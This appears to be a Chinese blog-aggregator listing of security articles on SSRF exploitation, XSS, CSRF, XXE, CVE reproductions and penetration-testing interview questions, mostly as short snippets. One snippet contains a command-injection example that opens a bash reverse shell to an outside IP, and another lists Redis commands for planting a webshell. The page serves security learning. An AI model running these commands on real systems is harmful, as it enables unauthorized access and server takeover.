SSRF漏洞利用

2021，零日漏洞最疯狂的一年

零日漏洞利用，即通过以前未知的漏洞发起网络攻击的方式，是黑客手中最有价值的武器，因为这些漏洞在公开市场上的价格很轻松就能超过100万美元。

GoUpSec·2025-07-21 08:16

【网络安全】XSS漏洞- XSS基础概述及利用

本章讲解XSS漏洞的基础理论和漏洞利用。

SUGERBOOM·2025-07-20 21:43

3步搞定Java漏洞修复？别再让黑客当“家”！

SSRF漏洞：像让城堡

·2025-07-19 12:53

ssrf漏洞复现

目录基础环境查看phpinfo发现线索探测端口+gopher协议基础环境这里发现一些基础协议呗过滤掉了。但是有个提示的info，于是先看看查看phpinfo发现线索发现这台主机的地址了，于是猜测这个网段应该还有其他主机，试了一下172.21.0.1:80172.21.0.3:80果然如下（0.1是陷阱就不浪费时间了，）探测端口+gopher协议然后对这个172.21.0.3这个主机探测端口发现63

ξ流ぁ星ぷ132·2025-07-12 17:26

网安面试题总结_1

外网外网打点的基本流程主要分为：靶标确认、信息收集、漏洞探测、漏洞利用、权限获取，其最终目的是为了获取靶标的系统权限/关键数据。而在整个打点流程中，信息收集较为重要。

安全君呀·2025-07-11 08:36

智能防御原理和架构

智能防御系统通过**AI驱动的动态感知、主动决策与自治响应**构建自适应防护体系，其核心在于将被动规则匹配升级为**预测性威胁狩猎**，实现对新型攻击（如AI生成的0day漏洞利用）的有效遏制。

hao_wujing·2025-07-11 03:08

2025年渗透测试面试题总结-2025年HW(护网面试) 40（题目+回答）

目录2025年HW(护网面试)401.SQL注入读写文件/二次注入/防御2.XSS类型及防御3.CSRF与XSS区别4.文件上传绕过与防御5.服务器解析漏洞6.XXE与SSRF7.RCE与PHP函数区别

·2025-07-10 22:05

XSLT注入与安全修复方法

SSRF（服务端请求伪造）xslt危

·2025-07-09 06:11

2025年渗透测试面试题总结-2025年HW(护网面试) 31（题目+回答）

.自我介绍2.渗透测试流程（五阶段模型）3.技术栈与开发经历4.自动化挖洞实践5.信息搜集方法论6.深度漏洞挖掘案例8.SQL注入实战技巧9.AWVS扫描与防御10.CSRFvsSSRF核心差异11.SSRF

独行soc·2025-07-07 16:50

网络安全实入门| 剖析HTTP慢速攻击（Slowloris）与Nginx防护配置

攻击者通过以下方式实现目标：协议漏洞利用：利用HTTP协议对请求完整性的依赖，例如不发送完整的请求头（如缺少\r\n\r\n结尾标识），使服务器持续等待数据。

码农突围计划·2025-07-06 05:01

浅谈SSRF

·在redis未授权的情况下如何写webshell命令：/bin/redis-server/etc/redis/redis.conf##启动redis进程ps-ef|grep'redis'##查看redis进程redis-cli-h127.0.0.1-p6379##若redis服务器开放到公网，没有密码校验，可直接连接**进入redis后，配置目录、数据库文件和参数：*configsetdir/w

mun1ight2u·2025-07-05 14:42

渗透测试中 phpinfo() 的信息利用分析

然而一旦该页面被暴露到互联网上，攻击者便可以借此收集大量目标系统的重要信息，从而为后续的漏洞利用、权限提升、提权横向等行为打下基础。本文将从实战角度分析phpinfo()页面中各类信息的渗透利用方式。

vortex5·2025-07-05 04:37

蓝队溯源反制一键利用工具

蓝队利器、溯源反制、NPS漏洞利用、NPSexp、NPSpoc、Burp插件、一键利用最近做攻防演练发现了很多内网穿透的工具，其中最多的就是nps，红队老哥好像还挺喜欢这个的，真的是多，每天导出攻击IP

网络安全进阶·2025-06-30 05:55

探索虚拟世界的裂缝：CVE-2021-3929与3947漏洞利用工具详解

探索虚拟世界的裂缝：CVE-2021-3929与3947漏洞利用工具详解去发现同类优质开源项目:https://gitcode.com/在安全研究的最前沿，有一类工具因其独特魅力和教育价值而备受关注。

缪昱锨Hunter·2025-06-28 22:44

【安全漏洞】深入剖析CVE-2021-40444-Cabless利用链

独立安全研究员EduardoB.在github公开了一种新的“无CAB”的漏洞利用方法及其POC。公众号之前发布的研判文章中已对在野利用中出现的新的Cable

IT老涵·2025-06-28 22:44

SQL注入与防御-第四章-1：利用SQL注入--20%

#理解常见的漏洞利用一、漏洞利用前提借助应用测试（如第2章）、复查源码技术（如第3章），发现Web应用中易受攻击参数后，进入利用阶段，需先明确：本地数据库辅助：搭建与目标同类型的本地数据库，便于测试、观察

在安全厂商修设备·2025-06-27 22:02

CSRF 与 SSRF 的关联与区别

CSRF与SSRF的关联与区别区别特性CSRF(跨站请求伪造)SSRF(服务器端请求伪造)攻击方向客户端→目标网站服务器→内部/外部资源攻击目标利用用户身份执行非预期操作利用服务器访问内部资源或发起对外请求受害者已认证的用户存在漏洞的服务器利用条件用户必须已登录目标网站需要存在可控制的服务器端请求功能常见场景修改密码

心一·2025-06-24 17:59

Apache Kafka Connect接口存在任意文件读取漏洞与SSRF漏洞CVE-2025-27817

@[toc]免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。1.ApacheKafka简介微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发ApacheKafka是一个分布式的流式数据平台，可以用于构建实时的数据管道和流式应用程序

sublime88·2025-06-23 21:46

CVE-2025-27817 POC

ApacheKafkaClients任意文件读取与SSRF漏洞漏洞成因该漏洞源于ApacheKafkaClient在配置SASL/OAUTHBEARER连接时，对sasl.oauthbearer.token.endpoint.url

章鱼哥喜欢吹笛子·2025-06-23 21:44

Java安全防线第一篇：SQL注入 - 你的数据库正在“裸奔“吗？

文件上传漏洞：黑客的"特洛伊木马"如何潜入XXE漏洞：XML解析如何成为系统后门反序列化漏洞：Java对象的"变身术"攻击SSRF漏洞：内网如何被"隔山打牛"RCE漏洞：系统命令执行的"死亡调用"JNDI

全息架构师·2025-06-23 02:38

WEB安全--CSRF&SSRF

一、CSRF1.1、原理跨站点请求伪造---攻击者诱导用户在已认证的web应用中执行非法操作，通过构造虚假的网页并在该网页中植入危险脚本，受害者在不知情的情况下进入该网页，网页就会盗用受害者浏览器中的session或cookie执行危险命令，可以你的名义发送邮件，发消息，盗用你的账号，甚至于购买商品，虚拟货币转账等。1.2、防御手段1、验证HTTPReferer字段（可绕过）2、请求地址中添加to

Neur0toxin·2025-06-20 22:32

ssrf漏洞利用+CTF实例

引发ssrf漏洞的几个函数file_get_contents()把整个文件读入一个字符串中，获取本地或者远程文件内容fsockopen()获得套接字信息curl_exec()执行一个curl会话，由curl_init

疯狂的小羊肖恩·2025-06-19 08:02

【漏洞挖掘】——33、SSRF攻防对抗(中)

重定向绕过检查场景介绍有时候通过利用开放重定向漏洞可以规避任何类型的基于过滤器的防御，在前面的SSRF示例中假设用户提交的URL经过严格验证以防止恶意利用SSRF行为，但是允许其URL的应用程序包含一个开放重定向漏洞

FLy_鹏程万里·2025-06-19 08:00

什么是渗透测试，对网站安全有哪些帮助？

渗透测试是一种在获得授权的前提下，模拟真实网络攻击场景，对目标网站或系统进行安全性评估的技术手段，其流程通常包括信息收集、漏洞扫描、漏洞利用、

上海云盾第一敬业销售·2025-06-18 18:28

Apache Solr stream.url SSRF与任意文件读取漏洞(附pythonEXP脚本)

ApacheSolr的某些功能存在过滤不严格，在ApacheSolr未开启认证的情况下，攻击者可直接构造特定请求开启特定配置，并最终造成SSRF或文件读取漏洞。

MD@@nr丫卡uer·2025-06-18 18:27

ffmpeg ，结合 SSRF任意文件读取漏洞

ffmpeg，结合SSRF任意文件读取漏洞前言一、ffmpeg是什么？

德古拉的杂货铺·2025-06-18 18:57

CVE-2017-15715 apache httpd换行解析漏洞复现

目录1.漏洞概述2.影响版本3.漏洞等级4.漏洞复现4.1Vulhub搭建漏洞环境4.2CVE-2017-15715换行解析漏洞利用5.漏洞修复1.漏洞概述在Apachehttpd2.4.0至2.4.29

afei00123·2025-06-18 18:57

SSRF6 利用ssrf漏洞结合RCE远程命令执行漏洞打组合拳

一.RCE远程命令执行漏洞的介绍可直接在目标服务器上执行任意命令---接管服务器该漏洞主要有命令执行函数引起：例如：system:()函数system("ping用户提供的参数")以下为以下执行符号：1.；指顺序执行2.&后台执行3.&&与条件执行4.|管道符执行5.||或条件执行例如我们以”;“举例：baidu.com;bash-i>&/dev/tcp/192.168.112.128/44440

浮江雾·2025-06-18 17:53

深入解析XXE漏洞利用：Base64编码的PHP过滤器+回调回传攻击

深入解析XXE漏洞利用：Base64编码的PHP过滤器+回调回传攻击在网络安全和CTF实战中，XXE（XMLExternalEntity）漏洞因其独特的攻击方式和广泛的应用环境，成为Web安全学习的重要一环

Bruce_xiaowei·2025-06-16 17:24

从 Log4j 到 typescript-eslint：开源软件供应链安全威胁情报深度解析与实践指南

风险全景图与核心威胁剖析▐供应链攻击入口模型攻击阶段攻击方式典型示例开发环节上游仓库投毒event-stream恶意包事件分发环节公共仓库劫持PyPI库的dependency-confusion依赖管理环节合法包漏洞利用

梦玄海·2025-06-14 17:00

Metasploit Framework（MSF）核心知识解析

二、核心组成与功能组件类型功能描述典型示例Exploit（漏洞利用模块）执行针对特定漏洞的攻击代码exploit/windows/smb/ms17_010_eternalbluePayload

lubiii_·2025-06-14 07:33

沙箱（Sandbox）

本文将深入探讨沙箱化的概念、工作原理、目的和优势，以及其在实际应用中的实现，特别是结合Docker容器和SSRF代理服务器的实践。一、什么是沙箱

fydw_715·2025-06-13 22:31

2025年渗透测试面试题总结-小鹏[实习]安全工程师（题目+回答）

ssrf是什么？6.ctf的时候负责什么方向的题7.为什么要搞信息安全，对安全这一块有多大的兴趣，

独行soc·2025-06-11 14:26

XXE漏洞简介

的两种声明方式实体实体分类内置实体(Built-inentities)字符实体（Characterentities）通用实体（Generalentities）参数实体(Parameterentities)XXE漏洞出现场景XXE漏洞利用任意文件读取系统命令执行探测内网端口无回显

月敛苏时意·2025-06-10 14:00

shiro、struts2、weblogic特征流量分析

**SSRF漏洞（CVE-2014-4210）**3.**T3协议

桑晒.·2025-06-08 23:00

零基础在实践中学习网络安全-皮卡丘靶场（第十六期-SSRF模块）

最后一期了，感谢大家一直以来的关注，如果您对本系列文章内容有问题或者有更好的方法，请在评论区发送。介绍其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据数据流:攻击者----->服务器---->目标地址根据后台使用的函数的不同,对

恰薯条的屑海鸥·2025-06-08 09:52

应对AppSec扩展难题：Burp Suite如何助力企业安全与合规双赢

每一个新的Web应用、API或微服务的上线，都可能为攻击者提供新的漏洞利用机会。与此同时，应用安全（AppSec）团队面临着在资源有限的情况下更快、更高效地完成任务的巨大压力。

慧都小妮子·2025-06-07 22:02

探索Heal项目的独特魅力：提高工作效率的简易指南

在信息技术的世界里，网络已经成为了我们生活中不可获取的部分，而网络漏洞利用也成为了很多技术爱好者探索的方向。

人工智能我来了·2025-06-06 21:11

Redis漏洞总结--未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)

Redis未授权--沙箱绕过--(CNVD-2015-07557)&&(CNVD-2019-21763)&&(CVE-2022-0543)环境复现CNVD-2015-07557未授权访问影响版本漏洞探测漏洞利用

SuperMan529·2025-06-04 21:10

软件安全：漏洞利用与渗透测试剖析、流程、方法、案例

而漏洞利用与渗透测试，作为软件安全领域中相互关联的两个关键环节，一个是黑客攻击的手段，一个是安全防护的方法，二者的博弈推动着软件安全技术不断发展。

ruanjiananquan99·2025-06-04 17:10

【网络安全】2025新手如何上手挖漏洞（非常详细）零基础入门到精通，看这篇就够了!

在这段时间里，我参与了多个实际项目的规划和实施，成功防范了各种网络攻击和漏洞利用，提高了互联网安全防护水平。也有很多小伙伴给我留言问我怎么学？怎么渗透？怎么挖漏洞？建议我们较合理的

认真写程序的强哥·2025-06-03 15:53

Kali Linux 渗透测试

渗透测试进阶技巧与实战策略漏洞利用的深度解析在Web应用漏洞利用中，SQL注入与命令注入的防御突破需要更精细的Payload构造。

阮茂林··2025-06-01 18:02

dify1.3.1应用服务与数据服务分离，附件及插件包迁移至minio，实现离线部署，保证插件正常运行

dify服务端包含api、worker、web、sandbox、plugin_daemon、ssrf_proxy、nginx七个服务，其中api与worker使用同一镜像。

Time_1023·2025-06-01 14:31

Emlog Pro 任意文件上传漏洞（CVE-2023-44974）

应急响应靶机训练-Web1漏洞原理/admin/plugin.php中存在任意文件上传漏洞使得攻击者能够通过上传构建的PHP文件来执行任意代码漏洞利用webshell上传（PHP木马）影响版本EmlogPro2.2.0

Point13reak·2025-05-31 13:04

ret2libc：CTF Pwn 中的关键利用技巧

三）构造攻击载荷（payload）（四）触发漏洞并执行攻击三、示例代码（一）漏洞程序（vuln.c）（二）利用代码（exp.c）在CTF（夺旗赛）的Pwn题目中，ret2libc是一种极为重要且常用的漏洞利用技术

阿贾克斯的黎明·2025-05-28 08:19

Python爬虫实战教程：自动抓取CTF比赛题目存档全流程详解

1.CTF比赛简介及数据来源分析1.1什么是CTF比赛CTF（CaptureTheFlag）是信息安全领域的攻防竞赛，参赛队伍需解决一系列安全相关题目（称为“题目”），题目涉及逆向、漏洞利用、密码学、web

Python爬虫项目·2025-05-27 19:09

第39天：WEB攻防-通用漏洞&CSRF&SSRF&协议玩法&内网探针&漏洞利用

目录CSRF：跨站请求伪造定义：举例条件CSRF的防护SSRF服务器端请求伪造举例漏洞利用攻击：端口扫描，指纹识别，漏洞利用，内网探针（端口字典爆破）--通过远程请求的方式，访问内网其他服务器。

My Year 2019·2025-05-25 00:15

未授权访问漏洞利用链实战总结

一、渗透测试核心思路攻击链路径：未授权访问→接口信息泄露→敏感数据获取→账户爆破→权限提升→系统控制二、关键步骤拆解与分析信息收集阶段初始突破口：系统登录页看似无效，但通过JS文件分析发现隐藏接口（如/productBase.do），体现代码审计重要性。目录爆破虽未果，但需结合其他手段（如框架特征、错误信息）辅助判断。技术栈识别：错误堆栈显示org.apache.struts.action.*，确

Alfadi联盟萧瑶·2025-05-23 22:20

新的Novidade漏洞利用工具包目标瞄准家用和SOHO路由器

趋势科技的研究人员于本周二（12月11日）发布消息称，他们已经发现了一种新的漏洞利用工具包（ExploitKit，EK），并将其命名为“Novidade”。

乖巧小墨宝·2025-05-23 06:00

Shiro721 反序列化漏洞（CVE-2019-12422）

目录Shiro550和Shiro721的区别判断是否存在漏洞漏洞环境搭建漏洞利用利用Shiro检测工具利用Shiro综综合利用工具这一篇还是参考别的师傅的好文章学习Shiro的反序列化漏洞上一篇也是Shiro

未知百分百·2025-05-18 03:56

推荐频道